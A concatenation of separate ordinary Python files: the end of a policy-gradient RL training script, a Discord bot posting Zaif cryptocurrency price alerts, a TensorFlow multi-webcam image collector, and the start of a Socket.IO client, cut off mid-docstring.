#========================================================================================#
# ----------SECTION 5----------
# Optional Baseline
#========================================================================================#
if nn_baseline:
baseline_prediction = tf.squeeze(build_mlp(
sy_ob_no,
1,
"nn_baseline",
n_layers=n_layers,
size=size))
# Define placeholders for targets, a loss function and an update op for fitting a
# neural network baseline. These will be used to fit the neural network baseline.
baseline_targets = tf.placeholder(shape=[None], name="baseline_targets", dtype=tf.float32)
baseline_loss = tf.nn.l2_loss(baseline_prediction - baseline_targets)
baseline_update_op = tf.train.AdamOptimizer(learning_rate).minimize(baseline_loss)
#========================================================================================#
# Tensorflow Engineering: Config, Session, Variable initialization
#========================================================================================#
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
sess = tf.Session(config=tf_config)
sess.__enter__() # equivalent to `with sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
ob = env.reset()
obs, acs, rewards = [], [], []
animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and animate)
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.05)
obs.append(ob)
ac = sess.run(sy_sampled_ac, feed_dict={sy_ob_no : ob[None]})
ac = ac[0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
rewards.append(rew)
steps += 1
if done or steps > max_path_length:
break
path = {"observation" : np.array(obs),
"reward" : np.array(rewards),
"action" : np.array(acs)}
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > min_timesteps_per_batch:
break
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
#====================================================================================#
# ----------SECTION 4----------
# Computing Q-values
#
# Your code should construct numpy arrays for Q-values which will be used to compute
# advantages (which will in turn be fed to the placeholder you defined above).
#
# Recall that the expression for the policy gradient PG is
#
# PG = E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * (Q_t - b_t )]
#
# where
#
# tau=(s_0, a_0, ...) is a trajectory,
# Q_t is the Q-value at time t, Q^{pi}(s_t, a_t),
# and b_t is a baseline which may depend on s_t.
#
# You will write code for two cases, controlled by the flag 'reward_to_go':
#
# Case 1: trajectory-based PG
#
# (reward_to_go = False)
#
# Instead of Q^{pi}(s_t, a_t), we use the total discounted reward summed over
# entire trajectory (regardless of which time step the Q-value should be for).
#
# For this case, the policy gradient estimator is
#
# E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * Ret(tau)]
#
# where
#
# Ret(tau) = sum_{t'=0}^T gamma^t' r_{t'}.
#
# Thus, you should compute
#
# Q_t = Ret(tau)
#
# Case 2: reward-to-go PG
#
# (reward_to_go = True)
#
# Here, you estimate Q^{pi}(s_t, a_t) by the discounted sum of rewards starting
# from time step t. Thus, you should compute
#
# Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'}
#
#
# Store the Q-values for all timesteps and all trajectories in a variable 'q_n',
# like the 'ob_no' and 'ac_na' above.
#
#====================================================================================#
q_n = []
if reward_to_go:
q_n = np.concatenate([discounted_rewards_to_go(path["reward"], gamma) for path in paths])
else:
q_n = np.concatenate([
[sum_discounted_rewards(path["reward"], gamma)] * pathlength(path)
for path in paths])
#====================================================================================#
# ----------SECTION 5----------
# Computing Baselines
#====================================================================================#
if nn_baseline:
# If nn_baseline is True, use your neural network to predict reward-to-go
# at each timestep for each trajectory, and save the result in a variable 'b_n'
# like 'ob_no', 'ac_na', and 'q_n'.
#
# Hint #bl1: rescale the output from the nn_baseline to match the statistics
# (mean and std) of the current or previous batch of Q-values. (Goes with Hint
# #bl2 below.)
b_n = sess.run(baseline_prediction, feed_dict={sy_ob_no: ob_no})
b_n = b_n * np.std(q_n, axis=0) + np.mean(q_n, axis=0)
adv_n = q_n - b_n
else:
adv_n = q_n.copy()
#====================================================================================#
# ----------SECTION 4----------
# Advantage Normalization
#====================================================================================#
if normalize_advantages:
adv_n = (adv_n - np.mean(adv_n)) / (np.std(adv_n) + 1e-8)
#====================================================================================#
# ----------SECTION 5----------
# Optimizing Neural Network Baseline
#====================================================================================#
if nn_baseline:
# ----------SECTION 5----------
# If a neural network baseline is used, set up the targets and the inputs for the
# baseline.
#
# Fit it to the current batch in order to use for the next iteration. Use the
# baseline_update_op you defined earlier.
#
# Hint #bl2: Instead of trying to target raw Q-values directly, rescale the
# targets to have mean zero and std=1. (Goes with Hint #bl1 above.)
q_n_mean = np.mean(q_n, axis=0)
q_n_std = np.std(q_n, axis=0)
q_n = (q_n - q_n_mean) / (q_n_std + 1e-7)
sess.run(baseline_update_op, feed_dict={sy_ob_no: ob_no, baseline_targets: q_n})
#====================================================================================#
# ----------SECTION 4----------
# Performing the Policy Update
#====================================================================================#
# Call the update operation necessary to perform the policy gradient update based on
# the current batch of rollouts.
#
# For debug purposes, you may wish to save the value of the loss function before
# and after an update, and then log them below.
_ = sess.run([update_op], feed_dict={sy_ob_no: ob_no,
sy_ac_na: ac_na,sy_adv_n: adv_n})
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vpg')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--reward_to_go', '-rtg', action='store_true')
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--nn_baseline', '-bl', action='store_true')
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=1)
parser.add_argument('--size', '-s', type=int, default=32)
args = parser.parse_args()
if not(os.path.exists('data')):
os.makedirs('data')
logdir = args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join('data', logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_PG(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
reward_to_go=args.reward_to_go,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
nn_baseline=args.nn_baseline,
seed=seed,
n_layers=args.n_layers,
size=args.size
)
# Awkward hacky process runs, because Tensorflow does not like
# repeatedly calling train_PG in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
p.join()
if __name__ == "__main__":
main()
|
bot.py
|
# coding=utf-8
import asyncio
import time
from datetime import datetime
from threading import Thread
from typing import Dict, Optional, Union
import discord
import requests
from colorama import Back
from discord import Game, Embed, Colour, Client, Channel
from .config import Config
from .stream import ZaifStream
from .utils import Utils
httpHeaders: Dict[str, str] = {
"User-Agent": "Zaifcord 1.0 (https://github.com/SlashNephy/Zaifcord)"
}
class ZaifBot:
def __init__(self, config: Config) -> None:
self.config: Config = config
self.loop: asyncio.AbstractEventLoop = asyncio.new_event_loop()
self.client: Client = Client(loop=self.loop)
self.textChannels: Dict[str, Channel] = {}
self.zaifStream: ZaifStream = ZaifStream(self.config.currencyPair)
self.priceHistory: Dict = {}
def getTicker(self) -> Optional[Dict]:
with requests.get(f"https://api.zaif.jp/api/1/ticker/{self.config.currencyPair}", headers=httpHeaders) as r:
try:
return r.json()
except Exception:
Utils.printError(f"ティッカーの取得に失敗しました: {self.config.currencyPair}")
return None
def getCoinMarketCapApi(self) -> Optional[Dict]:
if not self.config.coinmarketcapId:
return None
with requests.get(f"https://api.coinmarketcap.com/v1/ticker/{self.config.coinmarketcapId}/?convert=JPY", headers=httpHeaders) as r:
try:
t = r.json()
return t[0] if "error" not in t else None
except Exception:
Utils.printError(f"CoinMarketCapのティッカーの取得に失敗しました: {self.config.currencyPair}")
@staticmethod
def formatComma(x: Union[int, float]) -> str:
return "{:,}".format(x)
@staticmethod
def formatJPY(x: float) -> str:
x = round(x)
manUnit, okuUnit = int(1e4), int(1e8)
oku = x // okuUnit
x -= okuUnit * oku
man = x // manUnit
return f"約{oku}億{man}万円"
async def sendMessage(self, phase: int, up: bool, price: float):
key: str = f"{'u' if up else 'd'}_{phase}"
lastTime = self.priceHistory.get(key)
self.priceHistory[key] = datetime.now()
if lastTime and (datetime.now() - lastTime).total_seconds() < 180:
return
ticker = self.getTicker()
if not ticker:
return
coinmarketcapTicker = self.getCoinMarketCapApi()
if up:
if ticker["high"] <= price:
title = "高値更新中⤴"
else:
title = "上昇中⤴"
else:
if price <= ticker["low"]:
title = "安値更新中⤵"
else:
title = "下落中⤵"
percent = round((price / ticker["vwap"] - 1) * 100, 2)
embedObject = Embed(
title=f"{title} ({'+' if percent > 0 else ''}{percent}%)",
color=Colour(int("88B04B" if up else "FF4444", 16)),
description=f"{phase}円台に突入しました. 現在 {self.formatComma(price)}JPYです.",
timestamp=datetime.utcnow(),
)
embedObject.set_author(
name=f"{self.config.name} (Zaif)",
url=self.config.url
)
embedObject.set_footer(
text=datetime.now().strftime("%Y/%m/%d %H:%M") + " 時点"
)
embedObject.add_field(name="24h安値", value=self.formatComma(ticker["low"]))
embedObject.add_field(name="24h高値", value=self.formatComma(ticker["high"]))
embedObject.add_field(name="24h加重平均", value=self.formatComma(ticker["vwap"]))
embedObject.add_field(name="24h出来高", value=self.formatComma(ticker["volume"]))
if coinmarketcapTicker:
percent = round((price / float(coinmarketcapTicker["price_jpy"]) - 1) * 100, 2)
embedObject.description += f" 市場平均は {round(float(coinmarketcapTicker['price_jpy']), 2)}JPYで 乖離は{'+' if percent > 0 else ''}{percent}%です."
if coinmarketcapTicker["market_cap_jpy"]:
embedObject.add_field(name="時価総額", value=self.formatJPY(float(coinmarketcapTicker["market_cap_jpy"])))
embedObject.add_field(name="ランキング", value=coinmarketcapTicker["rank"] + "位")
for channel in self.textChannels.values():
await self.client.purge_from(channel, check=lambda x: x.author == self.client.user)
await self.client.send_typing(channel)
await self.client.send_message(channel, embed=embedObject)
Utils.printInfo(f"{self.config.name} が {Back.LIGHTRED_EX + '上昇中' if up else Back.LIGHTBLUE_EX + '下落中'}{Back.RESET}です. {phase}円台に突入しました. 現在の価格は {price}JPYです.")
async def stream(self) -> None:
self.zaifStream.start()
phase: int = None
while True:
try:
t = self.zaifStream.get()
if t:
price, action = t["last_price"]["price"], "買い" if t["last_price"]["action"] == "ask" else "売り"
latestPhase = int(price // self.config.width) * self.config.width
preciseLatestPhase = int(price // 10) * 10
if phase and phase != latestPhase:
await self.sendMessage(preciseLatestPhase, latestPhase > phase, price)
phase = latestPhase
await self.client.change_presence(
game=Game(
name=f"{preciseLatestPhase}円台{'前半' if price - preciseLatestPhase <= 5 else '後半'} (Zaif)"
)
)
if self.config.debug:
Utils.printDebug(f"{self.config.name}: {action} {price}JPY")
if self.zaifStream.isDead():
self.zaifStream.kill()
self.zaifStream = ZaifStream(self.config.currencyPair)
self.zaifStream.start()
await asyncio.sleep(10)
continue
await asyncio.sleep(0.5)
except Exception as e:
print(e)
def start(self) -> None:
Thread(target=self._start).start()
def _start(self) -> None:
@self.client.event
async def on_ready() -> None:
if len(self.client.servers) == 0:
Utils.printError("サーバに参加していません. https://discordapi.com/permissions.html などを利用してサーバにBotを追加してください.", critical=True)
for server in self.client.servers:
try:
await self.client.change_nickname(server.me, self.config.name)
except discord.errors.Forbidden:
pass
for channelId in self.config.textChannelIds:
self.textChannels[channelId] = self.client.get_channel(channelId)
Utils.printInfo(f"Discordに接続しました: Bot \"{self.config.name}\"")
await self.stream()
@self.client.event
async def on_error(event, *args, **kwargs) -> None:
Utils.printError(f"{event} -> {args} + {kwargs}")
while True:
try:
self.client.run(self.config.token)
except Exception as e:
Utils.printError(f"Discordとの接続が失われました ({e}). 3秒後に再接続します.")
time.sleep(3)
|
webcam.py
|
# Copyright 2017 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Collect images from multiple simultaneous webcams.
Usage:
1. Define some environment variables that describe what you're collecting.
dataset=your_dataset_name
mode=train
num_views=2
viddir=/tmp/tcn/videos
tmp_imagedir=/tmp/tcn/tmp_images
debug_vids=1
2. Run the script.
export DISPLAY=:0.0 && \
root=learning/brain/research/tcn && \
bazel build -c opt --copt=-mavx tcn/webcam && \
bazel-bin/tcn/webcam \
--dataset $dataset \
--mode $mode \
--num_views $num_views \
--tmp_imagedir $tmp_imagedir \
--viddir $viddir \
--debug_vids 1 \
--logtostderr
3. Hit Ctrl-C when done collecting, upon which the script will compile videos
for each view and optionally a debug video concatenating multiple
simultaneous views.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import multiprocessing
from multiprocessing import Process
import os
import subprocess
import sys
import time
import cv2
import matplotlib
matplotlib.use('TkAgg')
from matplotlib import animation # pylint: disable=g-import-not-at-top
import matplotlib.pyplot as plt
import numpy as np
from six.moves import input
import tensorflow as tf
tf.logging.set_verbosity(tf.logging.INFO)
tf.flags.DEFINE_string('dataset', '', 'Name of the dataset we`re collecting.')
tf.flags.DEFINE_string('mode', '',
'What type of data we`re collecting. E.g.:'
'`train`,`valid`,`test`, or `demo`')
tf.flags.DEFINE_string('seqname', '',
'Name of this sequence. If empty, the script will use'
'the name seq_N+1 where seq_N is the latest'
'integer-named sequence in the videos directory.')
tf.flags.DEFINE_integer('num_views', 2,
'Number of webcams.')
tf.flags.DEFINE_string('tmp_imagedir', '/tmp/tcn/data',
'Temporary outdir to write images.')
tf.flags.DEFINE_string('viddir', '/tmp/tcn/videos',
'Base directory to write debug videos.')
tf.flags.DEFINE_boolean('debug_vids', True,
'Whether to generate debug vids with multiple'
'concatenated views.')
tf.flags.DEFINE_string('debug_lhs_view', '0',
'Which viewpoint to use for the lhs video.')
tf.flags.DEFINE_string('debug_rhs_view', '1',
'Which viewpoint to use for the rhs video.')
tf.flags.DEFINE_integer('height', 1080, 'Raw input height.')
tf.flags.DEFINE_integer('width', 1920, 'Raw input width.')
tf.flags.DEFINE_string('webcam_ports', None,
'Comma-separated list of each webcam usb port.')
FLAGS = tf.app.flags.FLAGS
class ImageQueue(object):
"""An image queue holding each stream's most recent image.
Basically implements a process-safe collections.deque(maxlen=1).
"""
def __init__(self):
self.lock = multiprocessing.Lock()
self._queue = multiprocessing.Queue(maxsize=1)
def append(self, data):
with self.lock:
if self._queue.full():
# Pop the first element.
_ = self._queue.get()
self._queue.put(data)
def get(self):
with self.lock:
return self._queue.get()
def empty(self):
return self._queue.empty()
def close(self):
return self._queue.close()
class WebcamViewer(object):
"""A class which displays a live stream from the webcams."""
def __init__(self, display_queues):
"""Create a WebcamViewer instance."""
self.height = FLAGS.height
self.width = FLAGS.width
self.queues = display_queues
def _get_next_images(self):
"""Gets the next image to display."""
# Wait for one image per view.
not_found = True
combined = None
while not_found:
if True in [q.empty() for q in self.queues]:
# At least one image queue is empty; wait.
continue
else:
# Retrieve the images.
latest = [q.get() for q in self.queues]
combined = np.concatenate(latest, axis=1)
not_found = False
return combined
def run(self):
"""Displays the Kcam live stream in a window.
This function blocks until the window is closed.
"""
fig, rgb_axis = plt.subplots()
image_rows = self.height
image_cols = self.width * FLAGS.num_views
initial_image = np.zeros((image_rows, image_cols, 3))
rgb_image = rgb_axis.imshow(initial_image, interpolation='nearest')
def update_figure(frame_index):
"""Animation function for matplotlib FuncAnimation. Updates the image.
Args:
frame_index: The frame number.
Returns:
An iterable of matplotlib drawables to clear.
"""
_ = frame_index
images = self._get_next_images()
images = images[..., [2, 1, 0]]
rgb_image.set_array(images)
return rgb_image,
# We must keep a reference to this animation in order for it to work.
unused_animation = animation.FuncAnimation(
fig, update_figure, interval=50, blit=True)
mng = plt.get_current_fig_manager()
mng.resize(*mng.window.maxsize())
plt.show()
def reconcile(queues, write_queue):
"""Gets a list of concurrent images from each view queue.
This waits for latest images to be available in all view queues,
then continuously:
- Creates a list of current images for each view.
- Writes the list to a queue of image lists to write to disk.
Args:
queues: A list of `ImageQueues`, holding the latest image from each webcam.
write_queue: A multiprocessing.Queue holding lists of concurrent images.
"""
# Loop forever.
while True:
# Wait till all queues have an image.
if True in [q.empty() for q in queues]:
continue
else:
# Retrieve all views' images.
latest = [q.get() for q in queues]
# Copy the list of all concurrent images to the write queue.
write_queue.put(latest)
def persist(write_queue, view_dirs):
"""Pulls lists of concurrent images off a write queue, writes them to disk.
Args:
write_queue: A multiprocessing.Queue holding lists of concurrent images;
one image per view.
view_dirs: A list of strings, holding the output image directories for each
view.
"""
timestep = 0
while True:
# Wait till there is work in the queue.
if write_queue.empty():
continue
# Get a list of concurrent images to write to disk.
view_ims = write_queue.get()
for view_idx, image in enumerate(view_ims):
view_base = view_dirs[view_idx]
# Assign all concurrent view images the same sequence timestep.
fname = os.path.join(view_base, '%s.png' % str(timestep).zfill(10))
cv2.imwrite(fname, image)
# Move to the next timestep.
timestep += 1
def get_image(camera):
"""Captures a single image from the camera and returns it in PIL format."""
data = camera.read()
_, im = data
return im
def capture_webcam(camera, display_queue, reconcile_queue):
"""Captures images from simultaneous webcams, writes them to queues.
Args:
camera: A cv2.VideoCapture object representing an open webcam stream.
display_queue: An ImageQueue.
reconcile_queue: An ImageQueue.
"""
# Take some ramp images to allow cams to adjust for brightness etc.
for i in range(60):
tf.logging.info('Taking ramp image %d.' % i)
get_image(camera)
cnt = 0
start = time.time()
while True:
# Get images for all cameras.
im = get_image(camera)
# Replace the current image in the display and reconcile queues.
display_queue.append(im)
reconcile_queue.append(im)
cnt += 1
current = time.time()
if cnt % 100 == 0:
tf.logging.info('Collected %s of video, %d frames at ~%.2f fps.' % (
timer(start, current), cnt, cnt / (current - start)))
def timer(start, end):
"""Returns a formatted time elapsed."""
hours, rem = divmod(end - start, 3600)
minutes, seconds = divmod(rem, 60)
return '{:0>2}:{:0>2}:{:05.2f}'.format(int(hours), int(minutes), seconds)
def display_webcams(display_queues):
"""Builds an WebcamViewer to animate incoming images, runs it."""
viewer = WebcamViewer(display_queues)
viewer.run()
def create_vids(view_dirs, seqname):
"""Creates one video per view per sequence."""
vidbase = os.path.join(FLAGS.viddir, FLAGS.dataset, FLAGS.mode)
if not os.path.exists(vidbase):
os.makedirs(vidbase)
vidpaths = []
for idx, view_dir in enumerate(view_dirs):
vidname = os.path.join(vidbase, '%s_view%d.mp4' % (seqname, idx))
encode_vid_cmd = r'mencoder mf://%s/*.png \
-mf fps=29:type=png \
-ovc lavc -lavcopts vcodec=mpeg4:mbd=2:trell \
-oac copy -o %s' % (view_dir, vidname)
os.system(encode_vid_cmd)
vidpaths.append(vidname)
debugpath = None
if FLAGS.debug_vids:
lhs = vidpaths[FLAGS.debug_lhs_view]
rhs = vidpaths[FLAGS.debug_rhs_view]
debug_base = os.path.join('%s_debug' % FLAGS.viddir, FLAGS.dataset,
FLAGS.mode)
if not os.path.exists(debug_base):
os.makedirs(debug_base)
debugpath = '%s/%s.mp4' % (debug_base, seqname)
os.system(r"avconv \
-i %s \
-i %s \
-filter_complex '[0:v]pad=iw*2:ih[int];[int][1:v]overlay=W/2:0[vid]' \
-map [vid] \
-c:v libx264 \
-crf 23 \
-preset veryfast \
%s" % (lhs, rhs, debugpath))
return vidpaths, debugpath
def setup_paths():
"""Sets up the necessary paths to collect videos."""
assert FLAGS.dataset
assert FLAGS.mode
assert FLAGS.num_views
# Setup directory for final images used to create videos for this sequence.
tmp_imagedir = os.path.join(FLAGS.tmp_imagedir, FLAGS.dataset, FLAGS.mode)
if not os.path.exists(tmp_imagedir):
os.makedirs(tmp_imagedir)
# Create a base directory to hold all sequence videos if it doesn't exist.
vidbase = os.path.join(FLAGS.viddir, FLAGS.dataset, FLAGS.mode)
if not os.path.exists(vidbase):
os.makedirs(vidbase)
# Get one directory per concurrent view and a sequence name.
view_dirs, seqname = get_view_dirs(vidbase, tmp_imagedir)
# Get an output path to each view's video.
vid_paths = []
for idx, _ in enumerate(view_dirs):
vid_path = os.path.join(vidbase, '%s_view%d.mp4' % (seqname, idx))
vid_paths.append(vid_path)
# Optionally build paths to debug_videos.
debug_path = None
if FLAGS.debug_vids:
debug_base = os.path.join('%s_debug' % FLAGS.viddir, FLAGS.dataset,
FLAGS.mode)
if not os.path.exists(debug_base):
os.makedirs(debug_base)
debug_path = '%s/%s.mp4' % (debug_base, seqname)
return view_dirs, vid_paths, debug_path
def get_view_dirs(vidbase, tmp_imagedir):
"""Creates and returns one view directory per webcam."""
# Create and append a sequence name.
if FLAGS.seqname:
seqname = FLAGS.seqname
else:
# If there's no video directory, this is the first sequence.
if not os.listdir(vidbase):
seqname = '0'
else:
# Otherwise, get the latest sequence name and increment it.
seq_names = [i.split('_')[0] for i in os.listdir(vidbase)]
latest_seq = sorted(map(int, seq_names), reverse=True)[0]
seqname = str(latest_seq + 1)
tf.logging.info('No seqname specified, using: %s' % seqname)
view_dirs = [os.path.join(
tmp_imagedir, '%s_view%d' % (seqname, v)) for v in range(FLAGS.num_views)]
for d in view_dirs:
if not os.path.exists(d):
os.makedirs(d)
return view_dirs, seqname
def get_cameras():
"""Opens cameras using cv2, ensures they can take images."""
# Try to get free webcam ports.
if FLAGS.webcam_ports:
ports = map(int, FLAGS.webcam_ports.split(','))
else:
ports = range(FLAGS.num_views)
cameras = [cv2.VideoCapture(i) for i in ports]
if not all([i.isOpened() for i in cameras]):
try:
# Try to find and kill hanging cv2 process_ids.
output = subprocess.check_output(['lsof -t /dev/video*'], shell=True)
tf.logging.info('Found hanging cv2 process_ids: \n')
tf.logging.info(output)
tf.logging.info('Killing hanging processes...')
for process_id in output.split('\n')[:-1]:
subprocess.call(['kill %s' % process_id], shell=True)
time.sleep(3)
# Recapture webcams.
cameras = [cv2.VideoCapture(i) for i in ports]
except subprocess.CalledProcessError:
raise ValueError(
'Cannot connect to cameras. Try running: \n'
'ls -ltrh /dev/video* \n '
'to see which ports your webcams are connected to. Then hand those '
'ports as a comma-separated list to --webcam_ports, e.g. '
'--webcam_ports 0,1')
# Verify each camera is able to capture images.
ims = map(get_image, cameras)
assert False not in [i is not None for i in ims]
return cameras
def launch_images_to_videos(view_dirs, vid_paths, debug_path):
"""Launch job in separate process to convert images to videos."""
f = 'learning/brain/research/tcn/dataset/images_to_videos.py'
cmd = ['python %s ' % f]
cmd += ['--view_dirs %s ' % ','.join(i for i in view_dirs)]
cmd += ['--vid_paths %s ' % ','.join(i for i in vid_paths)]
cmd += ['--debug_path %s ' % debug_path]
cmd += ['--debug_lhs_view %s ' % FLAGS.debug_lhs_view]
cmd += ['--debug_rhs_view %s ' % FLAGS.debug_rhs_view]
cmd += [' & ']
cmd = ''.join(i for i in cmd)
# Call images_to_videos asynchronously.
fnull = open(os.devnull, 'w')
subprocess.Popen([cmd], stdout=fnull, stderr=subprocess.STDOUT, shell=True)
for p in vid_paths:
tf.logging.info('Writing final video to: %s' % p)
if debug_path:
tf.logging.info('Writing debug video to: %s' % debug_path)
def main(_):
# Initialize the camera capture objects.
cameras = get_cameras()
# Get one output directory per view.
view_dirs, vid_paths, debug_path = setup_paths()
try:
# Wait for user input.
try:
tf.logging.info('About to write to:')
for v in view_dirs:
tf.logging.info(v)
input('Press Enter to continue...')
except SyntaxError:
pass
# Create a queue per view for displaying and saving images.
display_queues = [ImageQueue() for _ in range(FLAGS.num_views)]
reconcile_queues = [ImageQueue() for _ in range(FLAGS.num_views)]
# Create a queue for collecting all tuples of multi-view images to write to
# disk.
write_queue = multiprocessing.Queue()
processes = []
# Create a process to display collected images in real time.
processes.append(Process(target=display_webcams, args=(display_queues,)))
# Create a process to collect the latest simultaneous images from each view.
processes.append(Process(
target=reconcile, args=(reconcile_queues, write_queue,)))
# Create a process to collect the latest simultaneous images from each view.
processes.append(Process(
target=persist, args=(write_queue, view_dirs,)))
for (cam, dq, rq) in zip(cameras, display_queues, reconcile_queues):
processes.append(Process(
target=capture_webcam, args=(cam, dq, rq,)))
for p in processes:
p.start()
for p in processes:
p.join()
except KeyboardInterrupt:
# Close the queues.
for q in display_queues + reconcile_queues:
q.close()
# Release the cameras.
for cam in cameras:
cam.release()
# Launch images_to_videos script asynchronously.
launch_images_to_videos(view_dirs, vid_paths, debug_path)
try:
sys.exit(0)
except SystemExit:
os._exit(0) # pylint: disable=protected-access
if __name__ == '__main__':
tf.app.run()
|
socketio_client.py
|
"""
SocketIOClient
==============
Example::
from amitu.socketio_client import SocketIOClient
sock = SocketIOClient("localhost", 8081)
def my_connect():
print("opened!")
sock.emit("browser", "data!")
sock.on("server", on_server)
def on_server(data):
print data
sock.on("connect", my_connect)
sock.run()
See ThreadedSocketIOClient below for a different usage example.
"""
import amitu.websocket_client
import httplib
import json
import time
import socket
import threading
from Queue import Queue
import logging
logger = logging.getLogger(__name__)
class SocketIOPacket(object):
def __init__(self, id="", endpoint="", data=None):
self.id = id
self.endpoint = endpoint
self.data = data
def __repr__(self):
return u"%s: id=<%s> endpoint=<%s> data=<%s>" % (
self.__class__.__name__, self.id, self.endpoint, self.data
)
def __unicode__(self):
packet = u"%s:%s:%s" % (self.type, self.id, self.endpoint)
if self.data is not None:
packet += u":" + self.data
return packet
class DisconnectPacket(SocketIOPacket):
type = "0"
class ConnectPacket(SocketIOPacket):
type = "1"
class HeartbeatPacket(SocketIOPacket):
type = "2"
class MessagePacket(SocketIOPacket):
type = "3"
class JSONMessagePacket(SocketIOPacket):
type = "4"
def __init__(self, id="", endpoint="", data=None, payload=None):
if payload is None:
payload = json.loads(data)
if data is None:
data = json.dumps(payload)
super(JSONMessagePacket, self).__init__(id, endpoint, data)
self.payload = payload
class EventPacket(SocketIOPacket):
type = "5"
def __init__(self, id="", endpoint="", data=None, name=None, args=None):
if name is None:
d = json.loads(data)
name = d["name"]
args = d["args"]
if data is None:
d = {"name": name, "args": args}
data = json.dumps(d)
super(EventPacket, self).__init__(id, endpoint, data)
self.name, self.args = name, args
def __repr__(self):
return u"%s: id=<%s> endpoint=<%s> name=<%s> args=<%s>" % (
self.__class__.__name__, self.id, self.endpoint,
self.name, self.args
)
class ACKPacket(SocketIOPacket):
type = "6"
class ErrorPacket(SocketIOPacket):
type = "7"
def __init__(
self, id="", endpoint="", data=None, reason=None, advice=None
):
if reason is None:
reason, advice = data.split("+", 1)
if data is None:
data = u"%s:%s" % (reason, advice)
super(ErrorPacket, self).__init__(id, endpoint, data)
self.reason, self.advice = reason, advice
def __repr__(self):
return u"%s: id=<%s> endpoint=<%s> reason=<%s> advice=<%s:%s>" % (
self.__class__.__name__, self.id, self.endpoint,
self.reason, self.advice
)
class NoopPacket(SocketIOPacket):
type = "8"
def parse_message(raw):
parts = raw.split(":", 3)
type = parts[0]
id = parts[1]
endpoint = parts[2]
if len(parts) == 4:
data = parts[3]
else:
data = None
return {
"0": DisconnectPacket, "1": ConnectPacket, "2": HeartbeatPacket,
"3": MessagePacket, "4": JSONMessagePacket, "5": EventPacket,
"6": ACKPacket, "7": ErrorPacket, "8": NoopPacket,
}[type](id, endpoint, data)
class SocketIOClient(amitu.websocket_client.WebSocket):
def __init__(self, server, port, protocol="ws", *args, **kw):
self.server = server
self.port = port
self.args = args
self.kw = kw
self.protocol = protocol
self.handlers = {}
def run(self):
conn = httplib.HTTPConnection(self.server + ":" + str(self.port))
conn.request('GET', '/socket.io/1/')
r = conn.getresponse().read()
hskey = r.split(":")[0]
super(SocketIOClient, self).__init__(
'%s://%s:%s/socket.io/1/websocket/%s' % (
self.protocol, self.server, self.port, hskey
), *self.args, **self.kw
)
super(SocketIOClient, self).run()
def on(self, name, callback):
self.handlers.setdefault(name, []).append(callback)
def fire(self, name, *args, **kw):
for callback in self.handlers.get(name, []):
callback(*args, **kw)
def emit(self, name, args):
self.send(EventPacket(name=name, args=[args]))
def onopen(self):
self.fire("connect")
def onmessage(self, msg):
self.fire("message", msg)
packet = parse_message(msg)
if isinstance(packet, HeartbeatPacket):
self.send(HeartbeatPacket())
if isinstance(packet, EventPacket):
self.fire(packet.name, packet.args[0])
def ontimeout(self):
handlers = self.handlers.get("timeout")
if handlers:
for handler in handlers:
handler()
else:
self.sock.close()
exit(1)
class ThreadedSocketIOClient(SocketIOClient):
"""The upstream amitu socket client can only send one message,
and then shuts down the connection.
This threaded client can handle a sequential conversation consisting
of multiple messages.
Example usage:
rcvd = []
def myfunc(msg):
